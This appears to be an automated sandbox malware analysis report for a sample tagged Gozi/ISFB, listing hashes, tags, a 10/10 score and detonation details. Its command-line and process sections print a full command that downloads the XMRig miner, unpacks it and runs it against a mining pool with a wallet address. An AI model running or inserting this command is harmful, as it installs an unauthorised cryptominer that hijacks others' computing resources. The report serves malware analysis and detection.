Malware Analysis Report

2025-01-22 18:43

Sample ID: 240929-d3c4es1dke
Target: 453286093b6b2d791b2505384bda59ccadebc3078ad66f13bf4a0262011aa954
SHA256: 453286093b6b2d791b2505384bda59ccadebc3078ad66f13bf4a0262011aa954
Tags: isfb 4099 gozi
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score

10/10

SHA256

453286093b6b2d791b2505384bda59ccadebc3078ad66f13bf4a0262011aa954

Threat Level: Known bad

The file 453286093b6b2d791b2505384bda59ccadebc3078ad66f13bf4a0262011aa954 was found to be: Known bad.

Malicious Activity Summary

isfb 4099 gozi

Gozi family

Unsigned PE

MITRE ATT&CK

N/A

Analysis: static1

Detonation Overview

Reported

2024-09-29 03:31

Signatures

Gozi family

gozi

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-29 03:31

Reported

2024-10-10 03:30

Platform

ubuntu2204-amd64-20240729-en

Max time kernel

0s

Command Line

[/tmp/453286093b6b2d791b2505384bda59ccadebc3078ad66f13bf4a0262011aa954.exe wget "https://github.com/xmrig/xmrig/releases/download/v6.22.0/xmrig-6.22.0-jammy-x64.tar.gz" && tar xvf xmrig-6.22.0-jammy-x64.tar.gz && cd xmrig-6.22.0 && ./xmrig --donate-level 5 -o rx-us.unmineable.com:3333 -u TRX:TX1itTERFgpH3ahh3E6hsSazdnVo8hEtry.21-11 -p x -a rx/0]

Signatures

N/A

Processes

/tmp/453286093b6b2d791b2505384bda59ccadebc3078ad66f13bf4a0262011aa954.exe

[/tmp/453286093b6b2d791b2505384bda59ccadebc3078ad66f13bf4a0262011aa954.exe wget "https://github.com/xmrig/xmrig/releases/download/v6.22.0/xmrig-6.22.0-jammy-x64.tar.gz" && tar xvf xmrig-6.22.0-jammy-x64.tar.gz && cd xmrig-6.22.0 && ./xmrig --donate-level 5 -o rx-us.unmineable.com:3333 -u TRX:TX1itTERFgpH3ahh3E6hsSazdnVo8hEtry.21-11 -p x -a rx/0]

Network

N/A

Files

N/A